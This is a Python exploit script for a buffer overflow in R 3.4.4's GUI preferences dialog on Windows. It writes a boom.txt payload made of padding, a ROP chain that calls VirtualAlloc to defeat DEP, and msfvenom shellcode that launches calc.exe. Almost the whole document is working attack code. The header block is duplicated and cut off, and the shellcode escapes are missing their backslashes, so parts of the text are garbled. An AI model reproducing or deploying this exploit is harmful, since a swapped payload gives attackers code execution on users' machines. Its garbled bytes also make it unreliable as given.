R 3.4.4 Windows 10 x64 Buffer Overflow

#!/usr/bin/python


###############################################
# R 3.4.4 Win10 x86 Buffer Overflow #
# discovered by: bzyo #
# #!/usr/bin/python


###############################################
# R 3.4.4 Win10 x86 Buffer Overflow #
# discovered by: bzyo #
# author: Charles Truscott #
# I love you Alison Thompson OAM #
# tested on: Windows 10 x86 #
# rebooted for practice defeating ASLR/DEP #
# #
# --------------------------------------------#

##############################################

# GUI Preferences -> paste boom.txt into 'Language for menus ...' -> click OK

import struct

pad = "A" * 292

rop = struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0x6e732b48) # ptr to &VirtualAlloc() [IAT R.dll]
rop += struct.pack("L", 0x6cba178c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll]
rop += struct.pack("L", 0x6ca57139) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack("L", 0x6bed7b2a) # POP EBP # RETN [Rlapack.dll]
rop += struct.pack("L", 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0xffffffff) # Value to negate, will become 0x00000001
rop += struct.pack("L", 0x6397474a) # NEG EAX # RETN [graphics.dll]
rop += struct.pack("L", 0x6c94e84f) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack("L", 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0xe7bf59f1) # put delta into eax (-> put 0x00001000 into edx)
rop += struct.pack("L", 0x6fed580f) # ADD EAX,1840B60F # RETN [grDevices.dll]
rop += struct.pack("L", 0x6ca3485a) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack("L", 0x63760b48) # POP ECX # RETN [Rgraphapp.dll]
rop += struct.pack("L", 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack("L", 0x71364d80) # NEG ECX # RETN [stats.dll]
rop += struct.pack("L", 0x6fed44a0) # POP EDI # RETN [grDevices.dll]
rop += struct.pack("L", 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack("L", 0x6c998dce) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0x90909090) # nop
rop += struct.pack("L", 0x7135a86c) # PUSHAD # RETN [stats.dll]


nop = "A" * 20

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' cmd=calc.exe exitfunc=thread -f python

boom = ""
boom += "xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29"
boom += "xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca"
boom += "xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca"
boom += "x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2"
boom += "x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17"
boom += "x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59"
boom += "xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1"
boom += "xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf"
boom += "x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82"
boom += "x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5"
boom += "x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4"
boom += "xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20"
boom += "x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d"
boom += "x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee"
boom += "x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9"
boom += "x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a"
boom += "x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d"




end = "xCC" * 588

poc = pad + rop + nop + boom + end

file = open("boom.txt", "w")
file.write(poc)
file.close
print "<3"